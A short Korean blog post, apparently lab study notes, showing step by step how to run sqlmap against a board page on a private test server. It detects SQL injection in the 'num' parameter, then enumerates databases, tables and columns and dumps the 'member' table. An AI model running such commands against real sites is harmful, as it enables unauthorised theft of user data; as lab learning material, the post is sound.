sqlmap

Date: 2022.11.01 Updated: 2022.11.01

카테고리: appatack

sqlmap 실행 테스트

┌──(root㉿kali)-[~]
└─# sqlmap

화면 캡처 2022-11-01 165112

도움말 확인

┌──(root㉿kali)-[~]
└─# sqlmap -h

화면 캡처 2022-11-01 165322

화면 캡처 2022-11-01 165353

취약점 확인

화면 캡처 2022-11-01 165724

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://172.16.0.111/board/board_view.php?num=40" -p "num"

화면 캡처 2022-11-01 170159

화면 캡처 2022-11-01 170230

데이터베이스 목록

# sqlmap -u "http://172.16.0.111/board/board_view.php?num=40" -p "num" --dbs

화면 캡처 2022-11-01 171542

지정된 데이터베이스내의 테이블 목록

# sqlmap -u "http://172.16.0.111/board/board_view.php?num=40" -p "num" -D "WebTest" --tables

화면 캡처 2022-11-01 171609

member 테이블의 칼럼

# sqlmap -u "http://172.16.0.111/board/board_view.php?num=40" -p "num" -D "WebTest" -T "member" --column

화면 캡처 2022-11-01 171627

member 테이블의 내용을 추출

# sqlmap -u "http://172.16.0.111/board/board_view.php?num=40" -p "num" -D "WebTest" -T "member" --dump

화면 캡처 2022-11-01 171658